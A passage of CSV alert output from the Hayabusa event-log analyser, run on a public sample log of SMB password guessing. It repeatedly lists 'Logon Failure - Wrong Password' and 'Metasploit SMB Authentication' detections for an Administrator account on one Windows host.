Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 